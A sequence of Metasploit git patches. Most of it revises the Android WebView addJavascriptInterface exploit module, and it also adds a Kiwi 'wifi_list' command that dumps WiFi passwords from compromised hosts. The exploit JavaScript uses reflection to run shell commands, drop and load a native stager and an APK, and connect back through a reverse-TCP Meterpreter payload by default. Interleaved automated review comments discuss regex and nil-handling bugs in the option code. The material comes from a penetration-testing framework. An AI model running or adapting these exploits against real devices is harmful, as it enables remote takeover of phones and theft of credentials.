@@ -61,6 +61,14 @@ TLV_TYPE_KIWI_KERB_TKT_CLIENTREALM = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 69 TLV_TYPE_KIWI_KERB_TKT_FLAGS = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 70) TLV_TYPE_KIWI_KERB_TKT_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 71) +TLV_TYPE_KIWI_WIFI_INT = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 75) +TLV_TYPE_KIWI_WIFI_INT_GUID = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 76) +TLV_TYPE_KIWI_WIFI_INT_STATE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 77) +TLV_TYPE_KIWI_WIFI_INT_DESC = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 78) +TLV_TYPE_KIWI_WIFI_PROFILE = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 79) +TLV_TYPE_KIWI_WIFI_PROFILE_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 80) +TLV_TYPE_KIWI_WIFI_PROFILE_XML = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 81) + end end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 248e174987..3502931aa2 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -69,7 +69,8 @@ class Console::CommandDispatcher::Kiwi "kerberos_ticket_use" => "Use a kerberos ticket", "kerberos_ticket_purge" => "Purge any in-use kerberos tickets", "kerberos_ticket_list" => "List all kerberos tickets", - "lsa_dump" => "Dump LSA secrets" + "lsa_dump" => "Dump LSA secrets", + "wifi_list" => "List wifi profiles/creds" } end 
@@ -327,6 +328,52 @@ class Console::CommandDispatcher::Kiwi print_good("Kerberos ticket applied successfully") end + def wifi_list_usage + print( + "\nUsage: wifi_list\n\n" + + "List WiFi interfaces, profiles and passwords.\n\n") + end + + # + # Dump all the wifi profiles/credentials + # + def cmd_wifi_list(*args) + # if any arguments are specified, then fire up a usage message + if args.length > 0 + wifi_list_usage + return + end + + results = client.kiwi.wifi_list + + if results.length > 0 + results.each do |r| + table = Rex::Ui::Text::Table.new( + 'Header' => "#{r[:desc]} - #{r[:guid]}", + 'Indent' => 0, + 'SortIndex' => 0, + 'Columns' => [ + 'Name', 'Auth', 'Type', 'Shared Key' + ] + ) + + print_line + r[:profiles].each do |p| + table << [p[:name], p[:auth], p[:key_type], p[:shared_key]] + end + + print_line table.to_s + print_line "State: #{r[:state]}" + end + else + print_line + print_error("No wireless profiles found on the target.") + end + + print_line + return true + end + # # Dump all the possible credentials to screen. # From 4bf6481242f19cad211d4a5a3f46c30d2e596e7e Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Wed, 2 Apr 2014 23:51:33 +0200 Subject: [PATCH 089/853] Added regex option to validate options --- lib/msf/core/option_container.rb | 33 ++++++++++++++++++++- modules/auxiliary/fuzzers/ftp/client_ftp.rb | 2 +- 2 files changed, 33 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/option_container.rb b/lib/msf/core/option_container.rb index d3b7901ca5..9283f1e3e3 100644 --- a/lib/msf/core/option_container.rb +++ b/lib/msf/core/option_container.rb @@ -20,6 +20,7 @@ class OptBase # attrs[1] = description (string) # attrs[2] = default value # attrs[3] = possible enum values + # attrs[4] = Regex to validate the option # def initialize(in_name, attrs = []) self.name = in_name 
@@ -29,6 +30,21 @@ class OptBase self.desc = attrs[1] self.default = attrs[2] self.enums = [ *(attrs[3]) ].map { |x| x.to_s } + regex_temp = attrs[4] || nil + if regex_temp + # convert to string + regex_temp = regex_temp.to_s if regex_temp.is_a? Regexp + # remove start and end character, they will be added later + regex_temp = regex_temp.sub(/^\^/, '').sub(/\$$/, '') + # Add start and end marker to match the whole regex + regex_temp = "^#{regex_temp}$" + begin + Regexp.compile(regex_temp) + self.regex = regex_temp + rescue RegexpError, TypeError => e + raise("Invalid Regex #{regex_temp}: #{e}") + end + end end # @@ -63,7 +79,18 @@ class OptBase # If it's required and the value is nil or empty, then it's not valid. # def valid?(value) - return (required? and (value == nil or value.to_s.empty?)) ? false : true + if required? + # required variable not set + return false if (value == nil or value.to_s.empty?) + end + if regex + if value.match(regex) + return true + else + return false + end + end + return true end # @@ -125,6 +152,10 @@ class OptBase # The list of potential valid values # attr_accessor :enums + # + # A optional regex to validate the option value + # + attr_accessor :regex protected diff --git a/modules/auxiliary/fuzzers/ftp/client_ftp.rb b/modules/auxiliary/fuzzers/ftp/client_ftp.rb index e1819f6a0e..0642f67b20 100644 --- a/modules/auxiliary/fuzzers/ftp/client_ftp.rb +++ b/modules/auxiliary/fuzzers/ftp/client_ftp.rb 
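Review bot: The validation pattern is wrapped as `"^#{regex_temp}$"`, and in Ruby `^` and `$` match at every line break, so a value with an embedded newline is accepted as long as one of its lines matches; `\A` and `\z` anchor the whole string. Two related problems sit in the same lines: `Regexp#to_s` yields `(?-mix:...)`, so the two `sub` calls never strip anchors from a Regexp argument, and a pattern with a top-level alternation is not grouped before the anchors are added. Using `regex_temp = regex_temp.source if regex_temp.is_a?(Regexp)` and `regex_temp = "\\A(?:#{regex_temp})\\z"` would address these, with the anchor-stripping `sub` calls updated to match; note that `source` drops flags such as `/i`, which would need carrying separately. `initialize` starts above the hunk.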
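Review bot: `valid?` calls `value.match(regex)` whenever a regex is set, but for an option that is not required `value` can be nil, and option subclasses may hand in non-String values, so the call can raise NoMethodError instead of returning a boolean. Matching the string form and skipping the check for an unset optional value avoids that: `return true if value.nil? || value.to_s.empty?` after the required test, then `!!value.to_s.match(regex)`. The inner `if`/`else` that returns `true` or `false` collapses into that single expression.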
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptPort.new('SRVPORT', [ true, "The local port to listen on.", 21 ]), - OptString.new('FUZZCMDS', [ true, "Comma separated list of commands to fuzz.", "LIST,NLST,LS,RETR" ]), + OptString.new('FUZZCMDS', [ true, "Comma separated list of commands to fuzz (Uppercase).", "LIST,NLST,LS,RETR", nil, /(?:[A-Z]+,?)+/ ]), OptInt.new('STARTSIZE', [ true, "Fuzzing string startsize.",1000]), OptInt.new('ENDSIZE', [ true, "Max Fuzzing string size.",200000]), OptInt.new('STEPSIZE', [ true, "Increment fuzzing string each attempt.",1000]), From 176cc848653637bb2c53bf7e77d5e78557e75e51 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Wed, 2 Apr 2014 17:21:13 -0500 Subject: [PATCH 090/853] Remove BES and calculate the pid manually. --- .../browser/webview_addjavascriptinterface.rb | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index cab66ca0f4..6b6c6fc8b4 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -7,7 +7,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - include Msf::Exploit::Remote::BrowserExploitServer + include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ 
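Review bot: The pattern `/(?:[A-Z]+,?)+/` supplied for `FUZZCMDS` nests a quantified character class inside a quantified group with an optional separator, so once OptBase anchors it, a long run of capitals followed by one invalid character can be split in exponentially many ways before the match fails. It also accepts a trailing comma such as `LIST,`. `/[A-Z]+(?:,[A-Z]+)*/` describes the same comma-separated list unambiguously and fails in linear time.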
@@ -77,15 +77,11 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Serving javascript") send_response(cli, js, 'Content-type' => 'text/javascript') else - super + print_status("Serving exploit HTML") + send_response_html(cli, html) end end - def on_request_exploit(cli, req, browser) - print_status("Serving exploit HTML") - send_response_html(cli, html) - end - def ndkstager(stagename) localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libndkstager.so') data = File.read(localfile, :mode => 'rb') @@ -99,6 +95,9 @@ class Metasploit3 < Msf::Exploit::Remote // ensure that the object contains a native interface try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; } + // get the pid + var pid = obj.getClass().forName('android.os.Process').getMethod('myPid', null).invoke(null, null); + // get the runtime so we can exec var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null); var runtime = m.invoke(null, null); @@ -106,9 +105,10 @@ class Metasploit3 < Msf::Exploit::Remote var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename), '\\\\x')}"; // get the process name, which will give us our data path - var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); + // $PPID does not seem to work on android 4.0, so we concat pids manually + var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']); var ch, path = '/data/data/'; - while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); } + while ((ch = p.getInputStream().read()) >= 0) { path += String.fromCharCode(ch); } var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; var stagePath = path + '/#{stagename}.apk'; var dexPath = path + '/#{stagename}.dex'; From 7d93d28f1ded2f36807a467a8f4957e70cf91f46 Mon Sep 17 00:00:00 2001 
From: Spencer McIntyre Date: Wed, 2 Apr 2014 21:57:17 -0400 Subject: [PATCH 091/853] Support more tab completion features --- lib/msf/ui/console/command_dispatcher/core.rb | 22 ++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index fcd294fa6c..9e42ec66fc 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2033,6 +2033,11 @@ class Core end end + unless str.blank? + res = res.select { |term| term.upcase.start_with?(str.upcase) } + res = res.map { |term| str << term[str.length..-1] } + end + return res end @@ -2737,6 +2742,8 @@ class Core p = framework.payloads.create(mod.datastore['PAYLOAD']) if (p and p.options.include?(opt)) res.concat(option_values_dispatch(p.options[opt], str, words)) + elsif (p and p.options.include?(opt.upcase)) + res.concat(option_values_dispatch(p.options[opt.upcase], str, words)) end end @@ -2770,8 +2777,10 @@ class Core end when 'Msf::OptAddressRange' - case str + when /^file:(.*)/ + files = tab_complete_filenames($1,words) + res += files.map { |f| "file:" << f } if files when /\/$/ res << str+'32' res << str+'24' @@ -2802,9 +2811,20 @@ class Core o.enums.each do |val| res << val end + when 'Msf::OptPath' files = tab_complete_filenames(str,words) res += files if files + + when 'Msf::OptBool' + res << 'true' + res << 'false' + + when 'Msf::OptString' + if (str =~ /^file:(.*)/) + files = tab_complete_filenames($1,words) + res += files.map { |f| "file:" << f } if files + end end return res From 55500ea2f33a78b0c56966059709c7d2349fd008 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Wed, 2 Apr 2014 21:53:12 -0500 Subject: [PATCH 092/853] Avoid the nullchar. --- .../exploits/android/browser/webview_addjavascriptinterface.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 6b6c6fc8b4..ec69512a81 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote // $PPID does not seem to work on android 4.0, so we concat pids manually var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']); var ch, path = '/data/data/'; - while ((ch = p.getInputStream().read()) >= 0) { path += String.fromCharCode(ch); } + while ((ch = p.getInputStream().read()) > 0) { path += String.fromCharCode(ch); } var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; var stagePath = path + '/#{stagename}.apk'; var dexPath = path + '/#{stagename}.dex'; From 1c57c0092cb54a5c2b69810d3458f7a631643582 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Wed, 2 Apr 2014 23:27:11 -0400 Subject: [PATCH 093/853] Tab complete case insensitive module options too --- lib/msf/ui/console/command_dispatcher/core.rb | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 9e42ec66fc..3baf4bbc11 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2035,7 +2035,7 @@ class Core unless str.blank? res = res.select { |term| term.upcase.start_with?(str.upcase) } - res = res.map { |term| str << term[str.length..-1] } + res = res.map { |term| str + term[str.length..-1] } end return res 
@@ -2735,6 +2735,8 @@ class Core # Is this option used by the active module? if (mod.options.include?(opt)) res.concat(option_values_dispatch(mod.options[opt], str, words)) + elsif (mod.options.include?(opt.upcase)) + res.concat(option_values_dispatch(mod.options[opt.upcase], str, words)) end # How about the selected payload? @@ -2779,8 +2781,8 @@ class Core when 'Msf::OptAddressRange' case str when /^file:(.*)/ - files = tab_complete_filenames($1,words) - res += files.map { |f| "file:" << f } if files + files = tab_complete_filenames($1, words) + res += files.map { |f| "file:" + f } if files when /\/$/ res << str+'32' res << str+'24' @@ -2813,7 +2815,7 @@ class Core end when 'Msf::OptPath' - files = tab_complete_filenames(str,words) + files = tab_complete_filenames(str, words) res += files if files when 'Msf::OptBool' @@ -2822,8 +2824,8 @@ class Core when 'Msf::OptString' if (str =~ /^file:(.*)/) - files = tab_complete_filenames($1,words) - res += files.map { |f| "file:" << f } if files + files = tab_complete_filenames($1, words) + res += files.map { |f| "file:" + f } if files end end From aecd13d31480ffac7a6b09ba2668fc7f0f03b4a0 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Thu, 3 Apr 2014 09:54:48 -0400 Subject: [PATCH 094/853] Tab complete the same case --- lib/msf/ui/console/command_dispatcher/core.rb | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 3baf4bbc11..dba1b109f5 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb 
@@ -2035,7 +2035,15 @@ class Core unless str.blank? res = res.select { |term| term.upcase.start_with?(str.upcase) } - res = res.map { |term| str + term[str.length..-1] } + res = res.map { |term| + if str == str.upcase + str + term[str.length..-1].upcase + elsif str == str.downcase + str + term[str.length..-1].downcase + else + str + term[str.length..-1] + end + } end return res From c035715a711f507b5895f429c60a3a6f7f88fc8c Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Sat, 5 Apr 2014 02:50:53 -0700 Subject: [PATCH 095/853] Update mybb_get_type_db.rb Changed the name of the variable _Version_server on _version_server according to the recommendation of jvazquez-r7 --- modules/auxiliary/gather/mybb_get_type_db.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index e20d863f2d..58d01b6d58 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb 
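Review bot: The re-casing in the new `map` block is applied to every candidate, including ones whose case matters. `str == str.upcase` is also true for a prefix with no letters at all (such as `/`), so the remainder of the candidate is upcased, and a lower-case prefix downcases the remainder of a mixed-case candidate. If `res` can hold case-sensitive values such as file names or enum values, the returned completion no longer matches the real value; the enclosing method starts outside this hunk, so that cannot be confirmed from here. Returning the candidate untouched when the typed prefix already matches exactly avoids this: `next term if term.start_with?(str)` as the first line of the block.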
@@ -73,19 +73,19 @@ class Metasploit3 < Msf::Auxiliary end #Check Web-Server - _Version_server = res['Server'] - if _Version_server - _Version_server = " Server Version: #{_Version_server}".ljust(40) + _version_server = res['Server'] + if _version_server + _version_server = " Server Version: #{_Version_server}".ljust(40) else - _Version_server = " Server Version: unknown".ljust(40) + _version_server = " Server Version: unknown".ljust(40) end #Check forum MyBB if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) return Exploit::CheckCode::Detected else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) return Exploit::CheckCode::Unknown end rescue RuntimeError => err From 5dbd124ef9440ae72923fb817d47184b8639c536 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Sat, 5 Apr 2014 02:53:43 -0700 Subject: [PATCH 096/853] Update mybb_get_type_db.rb --- modules/auxiliary/gather/mybb_get_type_db.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index 58d01b6d58..ad1e413cab 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary #Check Web-Server _version_server = res['Server'] if _version_server - _version_server = " Server Version: #{_Version_server}".ljust(40) + _version_server = " Server Version: #{_version_server}".ljust(40) else _version_server = " Server Version: unknown".ljust(40) end 
From 2e4c2b1637ae1f10e7ffe1f09e3d87db367221de Mon Sep 17 00:00:00 2001 From: joev Date: Mon, 7 Apr 2014 09:44:43 -0500 Subject: [PATCH 097/853] Disable Android 4.0, add arch detection. Android 4.0, it turns out, has a different echo builtin than the other androids. Until we can figure out how to drop a payload on a 4.0 shell, we cannot support it. Arch detection allows mips/x86/arm ndkstagers to work, unfortunately x86 ndkstager was not working, so it is disabled for now. --- data/js/detect/os.js | 13 +- .../browser/webview_addjavascriptinterface.rb | 186 ++++++++++++++---- 2 files changed, 154 insertions(+), 45 deletions(-) diff --git a/data/js/detect/os.js b/data/js/detect/os.js index 47250c2d32..9214b49118 100644 --- a/data/js/detect/os.js +++ b/data/js/detect/os.js @@ -20,6 +20,7 @@ arch_armle = "armle"; arch_x86 = "x86"; arch_x86_64 = "x86_64"; arch_ppc = "ppc"; +arch_mipsle = "mipsle"; window.os_detect = {}; @@ -184,9 +185,15 @@ window.os_detect.getVersion = function(){ } else if (platform.match(/arm/)) { // Android and maemo arch = arch_armle; - if (navigator.userAgent.match(/android/i)) { - os_flavor = 'Android'; - } + } else if (platform.match(/x86/)) { + arch = arch_x86; + } else if (platform.match(/mips/)) { + arch = arch_mipsle; + } + + + if (navigator.userAgent.match(/android/i)) { + os_flavor = 'Android'; } } else if (platform.match(/windows/)) { os_name = oses_windows; diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index ec69512a81..8794fa903a 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb 
@@ -7,28 +7,49 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn - autopwn_info({ - :os_flavor => "Android", - :arch => ARCH_ARMLE, + # Since the NDK stager is used, arch detection must be performed + SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE ] # todo: , ARCH_X86 ] + + # Most android devices are ARM + DEFAULT_ARCH = ARCH_ARMLE + + # Some of the default NDK build targets are named differently than + # msf's builtin constants. This mapping allows the ndkstager file + # to be looked up from the msf constant. + NDK_FILES = { + ARCH_ARMLE => 'armeabi', + ARCH_MIPSLE => 'mips' + } + + autopwn_info( + :os_flavor => 'Android', :javascript => true, :rank => ExcellentRanking, + + # The Android 4.0 shell is different than other versions of android + # in that the echo builtin does not allow the \x hex encoding syntax. + # Android 4.0 is still vulnerable to the Java reflection exploit, but + # until we find a way to drop and run the payload, we can't support + # it as a target. :vuln_test => %Q| - for (i in top) { - try { - top[i].getClass().forName('java.lang.Runtime'); - is_vuln = true; break; - } catch(e) {} + if (!navigator.userAgent.match(/Android 4\.0;/)) { + for (i in top) { + try { + top[i].getClass().forName('java.lang.Runtime'); + is_vuln = true; break; + } catch(e) {} + } } | - }) + ) def initialize(info = {}) super(update_info(info, - 'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution', - 'Description' => %q{ + 'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution', + 'Description' => %q{ This module exploits a privilege escalation issue in Android < 4.2's WebView component that arises when untrusted Javascript code is executed by a WebView that has one or more Interfaces added to it. The untrusted Javascript code can call into the Java Reflection 
@@ -46,72 +67,92 @@ class Metasploit3 < Msf::Exploit::Remote Note: Adding a .js to the URL will return plain javascript (no HTML markup). }, - 'License' => MSF_LICENSE, - 'Author' => [ + 'License' => MSF_LICENSE, + 'Author' => [ 'jduck', # original msf module 'joev' # static server ], - 'References' => [ + 'References' => [ ['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'], ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'], ['URL', 'http://50.56.33.56/blog/?p=314'], ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'], ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'] ], - 'Platform' => 'android', - 'Arch' => ARCH_DALVIK, - 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', }, - 'Targets' => [ [ 'Automatic', {} ] ], - 'DisclosureDate' => 'Dec 21 2012', - 'DefaultTarget' => 0, + 'Platform' => 'android', + 'Arch' => ARCH_DALVIK, + 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' }, + 'Targets' => [ [ 'Automatic', {} ] ], + 'DisclosureDate' => 'Dec 21 2012', + 'DefaultTarget' => 0, 'BrowserRequirements' => { - :source => 'script', - :os_flavor => "Android", - :arch => ARCH_ARMLE + :source => 'script', + :os_flavor => 'Android' } )) end + # Hooked to prevent BrowserExploitServer from attempting to do JS detection + # on requests for the static javascript file def on_request_uri(cli, req) - if req.uri.end_with?('js') - print_status("Serving javascript") - send_response(cli, js, 'Content-type' => 'text/javascript') + if req.uri =~ /\.js/ + serve_static_js(cli, req) else - print_status("Serving exploit HTML") - send_response_html(cli, html) + super end end - def ndkstager(stagename) - localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 
'libs', 'armeabi', 'libndkstager.so') + # The browser appears to be vulnerable, serve the exploit + def on_request_exploit(cli, req, browser) + arch = normalize_arch(browser[:arch]) + print_status "Serving #{arch} exploit..." + send_response_html(cli, html(arch)) + end + + # The NDK stager is used to launch a hidden APK + def ndkstager(stagename, arch) + localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so') data = File.read(localfile, :mode => 'rb') data.gsub!('PLOAD', stagename) end - def js + def js(arch) stagename = Rex::Text.rand_text_alpha(5) - %Q| + script = %Q| function exec(obj) { // ensure that the object contains a native interface try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; } // get the pid - var pid = obj.getClass().forName('android.os.Process').getMethod('myPid', null).invoke(null, null); + var pid = obj.getClass() + .forName('android.os.Process') + .getMethod('myPid', null) + .invoke(null, null); // get the runtime so we can exec - var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null); - var runtime = m.invoke(null, null); + var runtime = obj.getClass() + .forName('java.lang.Runtime') + .getMethod('getRuntime', null) + .invoke(null, null); + + // libraryData contains the bytes for a native shared object built via NDK + // which will load the "stage", which in this case is our android meterpreter stager. + // LibraryData is loaded via ajax later, because we have to access javascript in + // order to detect what arch we are running. + var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename, arch), '\\\\x')}"; + + // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains + // another stager which loads android meterpreter from the msf handler. 
var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}"; - var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename), '\\\\x')}"; // get the process name, which will give us our data path // $PPID does not seem to work on android 4.0, so we concat pids manually var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']); var ch, path = '/data/data/'; while ((ch = p.getInputStream().read()) > 0) { path += String.fromCharCode(ch); } + var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; var stagePath = path + '/#{stagename}.apk'; - var dexPath = path + '/#{stagename}.dex'; // build the library and chmod it runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor(); 
@@ -121,19 +162,80 @@ class Metasploit3 < Msf::Exploit::Remote runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor(); runtime.exec(['chmod', '700', stagePath]).waitFor(); + // load the library (this fails in x86, figure out why) runtime.load(libraryPath); + + // delete dropped files runtime.exec(['rm', stagePath]).waitFor(); runtime.exec(['rm', libraryPath]).waitFor(); - runtime.exec(['rm', dexPath]).waitFor(); return true; } - for (i in top) { if (exec(top[i]) === true) break; } + if (!navigator.userAgent.match(/Android 4\.0;/)) { + for (i in top) { if (exec(top[i]) === true) break; } + } + | + + # remove comments and empty lines + script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '') + end + + # Called when a client requests a .js route. + # This is handy for post-XSS. + def serve_static_js(cli, req) + arch = req.qstring['arch'] + response_opts = { 'Content-type' => 'text/javascript' } + + if arch.present? + print_status("Serving javascript for arch #{normalize_arch arch}") + send_response(cli, js(normalize_arch arch), response_opts) + else + print_status("Serving arch detection javascript") + send_response(cli, static_arch_detect_js, response_opts) + end + end + + # This is served to requests for the static .js file. + # Because we have to use javascript to detect arch, we have 3 different + # versions of the static .js file (x86/mips/arm) to choose from. This + # small snippet of js detects the arch and requests the correct file. 
+ def static_arch_detect_js + %Q| + var arches = {}; + arches['#{ARCH_ARMLE}'] = /arm/i; + arches['#{ARCH_MIPSLE}'] = /mips/i; + arches['#{ARCH_X86}'] = /x86/i; + + var arch = null; + for (var name in arches) { + if (navigator.platform.toString().match(arches[name])) { + arch = name; + break; + } + } + + if (arch) { + // load the script with the correct arch + var script = document.createElement('script'); + script.setAttribute('src', '#{get_uri}/#{Rex::Text::rand_text_alpha(5)}.js?arch='+arch); + script.setAttribute('type', 'text/javascript'); + + // ensure body is parsed and we won't be in an uninitialized state + setTimeout(function(){ + var node = document.body \|\| document.head; + node.appendChild(script); + }, 100); + } | end - def html - "" + # @return [String] normalized client architecture + def normalize_arch(arch) + if SUPPORTED_ARCHES.include?(arch) then arch else DEFAULT_ARCH end + end + + def html(arch) + "" end end From 7b9b20a07ecf5258fe208f92665abfbc999619bd Mon Sep 17 00:00:00 2001 From: silascutler Date: Mon, 7 Apr 2014 14:30:52 -0400 Subject: [PATCH 098/853] Corrected Spaces Issues Removed extra spaces on line 23&24 --- modules/auxiliary/scanner/elasticsearch/es_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index 0e8735fdc5..804cc8fcc9 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary 'Silas Cutler ' ], 'License' => MSF_LICENSE - )) + )) register_options( [ From fc841331d280e0b8b187a259be3c7a4af0dcce7e Mon Sep 17 00:00:00 2001 
From: Joe Vennix Date: Tue, 8 Apr 2014 17:58:31 -0500 Subject: [PATCH 099/853] Add a test on echo to check for hex support. * This is much nicer than checking version on userAgent, which is often changed when rendered in an embedded webview. --- .../browser/webview_addjavascriptinterface.rb | 53 ++++++++++++------- 1 file changed, 33 insertions(+), 20 deletions(-) diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 8794fa903a..671fe0e83d 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -28,20 +28,12 @@ class Metasploit3 < Msf::Exploit::Remote :os_flavor => 'Android', :javascript => true, :rank => ExcellentRanking, - - # The Android 4.0 shell is different than other versions of android - # in that the echo builtin does not allow the \x hex encoding syntax. - # Android 4.0 is still vulnerable to the Java reflection exploit, but - # until we find a way to drop and run the payload, we can't support - # it as a target. :vuln_test => %Q| - if (!navigator.userAgent.match(/Android 4\.0;/)) { - for (i in top) { - try { - top[i].getClass().forName('java.lang.Runtime'); - is_vuln = true; break; - } catch(e) {} - } + for (i in top) { + try { + top[i].getClass().forName('java.lang.Runtime'); + is_vuln = true; break; + } catch(e) {} } | ) @@ -97,6 +89,8 @@ class Metasploit3 < Msf::Exploit::Remote def on_request_uri(cli, req) if req.uri =~ /\.js/ serve_static_js(cli, req) + elsif req.uri =~ /\.msg/ && req.body.to_s.length < 100 + print_warning "Received message: #{req.body}" else super end 
